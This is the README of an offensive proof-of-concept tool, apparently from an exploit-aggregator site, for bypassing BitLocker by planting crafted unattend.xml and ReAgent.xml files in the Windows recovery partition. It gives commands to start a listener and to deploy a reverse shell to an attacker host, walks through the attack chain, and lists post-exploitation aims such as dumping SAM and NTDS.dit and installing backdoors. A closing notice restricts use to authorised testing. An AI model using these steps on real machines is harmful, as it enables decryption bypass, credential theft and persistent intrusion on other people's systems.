## https://sploitus.com/exploit?id=F055329D-ACB6-5DF3-B8FD-CECCAF117BCB
# GreatXML Reverse-Shell POC
A self-contained Python proof-of-concept demonstrating BitLocker bypass by replacing XML files inside the Windows RE recovery partition, based on the **GreatXML** research.
This repository is a fork / red-team adaptation of the original disclosure by **Nightmare Eclipse** (Dead eclipse):
- Original write-up: https://deadeclipse666.blogspot.com/2026/06/greatxml-bitlocker-that-seems-to-only.html
- Original repository mirrors:
- https://git.projectnightcrawler.dev/NightmareEclipse/GreatXML
- https://github.com/MSNightmare/GreatXML
- https://git.churchofmalware.org/Nightmare_Eclipse/GreatXML
## Features
- Automatic recovery-partition detection via `diskpart`.
- Dynamic generation of `unattend.xml` for a given `LHOST`/`LPORT`.
- Built-in listener for the attacking machine.
- Built-in PowerShell reverse shell executed inside WinPE/WinRE.
- Activation via Defender Offline Scan (`--scan`) or WinRE reboot (`--reboot`).
## Requirements
- Windows 10/11 target machine.
- Python 3.x.
- Administrator privileges on the target.
- Network reachability between target and attacker.
- A recovery partition on the target.
- More reliable if Windows Defender Offline Scan has previously run on the target.
## Usage
### 1. Start the listener (attacker machine)
```powershell
python greatxml_poc.py --listen --lhost 0.0.0.0 --lport 4444
```
### 2. Deploy on the target (as Administrator)
Trigger via Defender Offline Scan:
```powershell
python greatxml_poc.py --lhost 192.168.1.100 --lport 4444 --scan
```
Or reboot into WinRE:
```powershell
python greatxml_poc.py --lhost 192.168.1.100 --lport 4444 --reboot
```
### 3. Catch the shell
Once triggered, the target connects back to the listener. You will get an interactive PowerShell prompt running in the WinPE/WinRE context.
## Arguments
| Argument | Description |
|----------|-------------|
| `--lhost` | Attacker IP for the reverse shell. |
| `--lport` | Attacker port for the reverse shell (default: `4444`). |
| `--letter` | Force a drive letter for the recovery partition. |
| `--reboot` | Reboot the target into WinRE after deployment. |
| `--scan` | Trigger Defender Offline Scan after deployment. |
| `--listen` | Start the listener on the attacker machine. |
## Examples
Start listener:
```powershell
python greatxml_poc.py --listen --lhost 0.0.0.0 --lport 4444
```
Deploy and activate via Defender Offline Scan:
```powershell
python greatxml_poc.py --lhost 192.168.1.100 --lport 4444 --scan
```
Deploy with a forced recovery-partition letter:
```powershell
python greatxml_poc.py --lhost 192.168.1.100 --lport 4444 --letter R
```
## How it works
1. The script locates the recovery partition and temporarily assigns it a drive letter.
2. `unattend.xml` is written to the root of the recovery partition.
3. A modified `ReAgent.xml` is written to `\Recovery\WindowsRE\`.
4. When WinRE / Defender Offline boots, the Windows PE environment processes `unattend.xml`.
5. During the `windowsPE` pass, `RunSynchronousCommand` writes `X:\rev.cmd` and executes it.
6. `rev.cmd` launches a base64-encoded PowerShell reverse shell.
7. PowerShell connects back to the attacker listener.
8. The attacker receives an interactive PowerShell session with access to the BitLocker-protected volume.
## Gained access
- Read/write files on the BitLocker-protected drive without a recovery key.
- Dump `SAM`, `SECURITY`, `SYSTEM`, and `NTDS.dit`.
- Extract user data.
- Install persistence or backdoors.
## Limitations
- Physical or administrative access to the target is required.
- Administrator privileges are required.
- More reliable when Windows Defender Offline Scan has previously run.
- WinRE may not bring up the network if required drivers are missing.
## Security notice
This tool is intended for:
- CTF and lab exercises.
- Authorized penetration testing with written permission.
- Security research and defense-hardening activities.
Do not use on systems you do not own or have explicit permission to test.
## License
Use at your own risk. The author is not responsible for unauthorized or illegal use.
## Attribution
Original vulnerability research and PoC files by **Nightmare Eclipse** (Dead eclipse).
This Python reverse-shell fork was created for red-team lab / CTF use.